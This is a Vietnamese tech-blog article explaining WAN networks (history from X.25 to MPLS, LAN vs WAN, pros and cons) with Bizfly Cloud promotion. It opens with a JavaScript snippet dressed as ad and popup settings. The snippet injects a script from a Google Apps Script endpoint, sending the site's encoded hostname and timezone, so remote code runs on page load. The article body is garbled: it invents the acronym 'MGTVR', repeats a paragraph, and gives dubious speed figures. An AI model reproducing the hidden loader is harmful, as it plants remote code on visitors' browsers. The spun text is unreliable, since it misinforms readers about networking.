var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Mạng WAN là gì? Những thông tin cần biết về mạng WAN

 • Techblog.
 • Kiến thức căn bản.
 • Mạng WAN là gì? Những thông tin cần biết về mạng WAN

  Công nghệ mạng diện rộng – WAN đã trở thành khái niệm phổ biến đối với những người thường xuyên truy cập internet trong xã hội hiện nay. Tuy nhiên, với những người mới sử dụng, đây là một trong những câu hỏi được đề cập nhiều nhất. Hãy cùng Bizfly Cloud tìm hiểu thông tin chi tiết nhé!

  Mạng WAN là gì?

  Mạng Giao Tiếp Vùng Rộng, viết tắt là MGTVR, là một mạng có khả năng mở rộng các kết nối trên nhiều khu vực địa lý rộng lớn từ các thành phố, tiểu bang cho tới các quốc gia. Mạng MGTVR có thể được sử dụng như một mạng cá nhân để kết nối các bộ phận trong một doanh nghiệp hoặc được sử dụng ở chế độ công khai để kết nối các mạng nhỏ hơn với nhau.

  Mạng Wan là gì? Mạng Wan được viết tắt của các từ nào

  Hệ thống Wan hỗ trợ liên kết các thành phần trong tổ chức kinh doanh.

  Mạng WAN là gì, cách đơn giản nhất là bạn hãy tưởng tượng Wan như mạng internet nói chung. Thực tế, internet chính là một mạng WAN lớn nhất trên toàn cầu. Bởi vì thông qua việc sử dụng các nhà cung cấp dịch vụ mạng (ISP), internet kết nối rất nhiều các mạng địa phương nhỏ (LAN) hoặc mạng khu vực đô thị (MAN) với nhau, nên internet được coi là một mạng WAN.

  Tại một quy mô nhỏ hơn, một tổ chức có thể có trụ sở chính và các chi nhánh nhỏ hơn, cùng với mạng WAN và dịch vụ điện toán đám mây. Mạng WAN sẽ được áp dụng để liên kết tất cả các phòng ban và khu vực của tổ chức với nhau trong tình huống này.

  Giao tiếp là mục tiêu cuối cùng của việc nối các mạng nhỏ từ các vị trí khác nhau, dù ở khoảng cách xa hay gần, và có kết nối mạng rộng với nhau hay không.

  WAN đôi khi được dùng để chỉ mạng không dây, nhưng thường thì ta sử dụng từ viết tắt WLAN. Chú ý:

  Các mạng WAN được kết nối ra sao?

   mạng WAN là gì? Liên kết giữa các mạng Wan trong phạm vi lớn.

  Liên kết giữa các mạng Wan trong phạm vi lớn.

  Sử dụng mạng riêng ảo (VPN) để liên kết các thành phần khác nhau trong mạng WAN được coi là phù hợp, bởi vì theo định nghĩa mạng WAN hỗ trợ một khoảng cách địa lý xa hơn LAN. Do đó, thông tin truyền tải giữa các trang web được bảo vệ tốt hơn, điều này rất cần thiết khi truyền tải dữ liệu thông qua mạng internet.

  Các mạng công cộng không phải lúc nào cũng đáp ứng được mức độ tương đương với một liên kết WAN đặc biệt, mặc dù VPN đảm bảo an ninh phù hợp cho việc kinh doanh. Vì vậy, cáp quang được sử dụng để hỗ trợ kết nối giữa các liên kết WAN.

  X.25, Frame Relay và MPLS

  Từ những năm 1970, các mạng mở rộng WAN được xây dựng dựa trên chuẩn công nghệ X.25 đã hỗ trợ hoạt động của máy ATM, hệ thống giao dịch thẻ tín dụng và một số dịch vụ thông tin trực tuyến. Các mạng X.25 cũ hơn đã chạy bằng kết nối modem quay số tốc độ 56 Kbps.

  Sau đó, công nghệ Frame Relay được ra đời để đơn giản hóa các giao thức X.25 và cung cấp một giải pháp tiết kiệm chi phí hơn cho các mạng WAN khi cần chạy ở tốc độ cao hơn. Frame Relay đã trở thành một lựa chọn phổ biến cho các công ty viễn thông tại Hoa Kỳ trong những năm 1990, đặc biệt là AT & T. Các giao thức X.25 được đơn giản hóa bởi công nghệ Frame Relay và giải pháp tiết kiệm chi phí hơn được cung cấp cho các mạng WAN khi cần chạy ở tốc độ cao hơn. AT & T đặc biệt ưa chuộng công nghệ này và Frame Relay đã trở thành một lựa chọn phổ biến cho các công ty viễn thông tại Hoa Kỳ trong những năm 1990.

  Công nghệ Multiprotocol Label Switching (MPLS) đang được phát triển tiếp để thay thế Frame Relay bằng cách cải thiện các giao thức hỗ trợ xử lý lưu lượng truyền tải âm thanh, video và các loại dữ liệu thông thường. Tính năng Quality of Service (QoS) là yếu tố quan trọng giúp MPLS thành công. Dịch vụ mạng “triple play” được xây dựng trên MPLS ngày càng phổ biến và tăng trưởng nhanh chóng trong những năm 2000, và cuối cùng đã thay thế hoàn toàn Frame Relay.

  Sự khác biệt giữa mạng LAN và WAN

  Sự phân biệt giữa mạng LAN và WAN nằm ở việc sử dụng các thiết bị khác nhau. Dưới đây là một số điểm khác biệt giữa hai công nghệ này:

  Tốc độ.

  Hệ thống mạng LAN sử dụng sẽ có tốc độ truyền dữ liệu nhanh hơn so với mạng WAN, đặc biệt là trong môi trường kết nối mạng rộng. Điều này không giống như quan niệm phổ biến rằng mạng WAN sẽ có tốc độ truyền dữ liệu nhanh hơn. Nguyên nhân là do khoảng cách kết nối của mạng LAN ngắn hơn so với mạng WAN.

  Mạng Wan là gì? Phân biệt mạng Lan và mạng Wan

  Phân biệt mạng Lan và mạng Wan

  Phạm vi.

 • Đối với mạng LAN phạm vi kết nối tương đối nhỏ chỉ ở văn phòng, nhà ở hay những khuôn viên nhỏ.
 • Mạng WAN có phạm vi kết nối rộng và không giới hạn.
 • Tốc độ truyền tải dữ liệu.

 • Tốc độ truyền tải mạng LAN dao động từ 10 – 100Mbps.
 • Tốc độ truyền tải trên mạng WAN dao động từ 256Kbps đến 2Mbps.
 • Băng thông.

 • Mạng LAN: Rộng lớn.
 • Mạng WAN: Yếu.
 • Chi phí.

  Sử dụng mạng LAN sẽ giúp tiết kiệm chi phí hơn nhiều so với việc dùng mạng WAN.

  Ưu, nhược điểm của mạng Wan

  Mạng Wan có thể kết nối được những thiết bị có khoảng cách về mặt địa lý khá xa. Có khả năng kết nối được từ 20 thiết bị trở lên. Vậy mạng Wan có những ưu và nhược điểm ra sao? Dưới đây là một vài ưu, nhược điểm của mạng Wan:\.

  Ưu điểm

  Một số đặc trưng đáng chú ý của mạng WAN có thể bao gồm:.

 • An ninh tương đối tốt, khả năng tiếp cận cao.
 • Lưu trữ và chia sẻ dữ liệu một cách nhanh nhẹn.
 • Nhân viên và khách hàng có thể tương tác với nhau nhanh chóng và dễ dàng trên cùng một mạng.
 • Khả năng kết nối các khoảng cách xa.
 • Quản lý một cách dễ dàng, không quá rắc rối.
 • Nhược điểm

  Ngoài những điểm mạnh đã được đề cập, mạng WAN cũng tồn tại những giới hạn như sau:

 • Chi phí sử dụng đắt đỏ.
 • Tốc độ truyền thông khá thấp, dễ bị mất kết nối.
 • Các vấn đề có thể gặp phải với mạng WAN

  Nó có giá cao hơn nhiều so với mạng nội bộ công ty hoặc mạng intranet, đây là vấn đề đầu tiên và có thể là một rào cản trong việc sử dụng mạng WAN.

  Liên quan đến quyền sở hữu và các quy định hạn chế sử dụng mạng, các tranh chấp có thể xảy ra giữa các chính phủ do các mạng WAN có khả năng vượt qua các giới hạn về lãnh thổ thuộc các phạm vi pháp lý khác nhau.

  Sử dụng dây cáp dưới đáy biển là điều cần thiết cho mạng WAN toàn cầu để kết nối các mạng trên khắp các châu lục. Tuy nhiên, dây cáp dưới đáy biển có thể bị hỏng không có ý định từ tàu biển và do thời tiết xấu.

  Bạn đọc có thể tham khảo nhiều mạng khác để tìm hiểu sâu hơn về mạng WAN. Tuy nhiên, lựa chọn mạng phù hợp phải căn cứ vào mục đích sử dụng. Mong rằng bài viết này sẽ giúp bạn hiểu rõ hơn về khái niệm mạng WAN.

  Theo chia sẻ của Bizfly Cloud.

  BizFly Cloud”>BizFly Cloud là nhà cung cấp dịch vụ điện toán đám mây với chi phí thấp, được vận hành bởi VCCorp.

  BizFly Cloud là một trong bốn công ty chủ chốt của “Chiến dịch thúc đẩy chuyển đổi số bằng công nghệ đám mây tại Việt Nam” do Bộ Thông tin và Truyền thông đưa ra. Nền tảng đám mây của BizFly Cloud đáp ứng đầy đủ các tiêu chuẩn và chỉ tiêu kỹ thuật, phục vụ cho Chính phủ và chính quyền điện tử.

  Những người đọc quan tâm đến những giải pháp của BizFly Cloud có thể truy cập tại đường dẫn này.

  Trải nghiệm dùng thử miễn phí và nhận ưu đãi trong 3 tháng tại trang web Manage.Bizflycloud.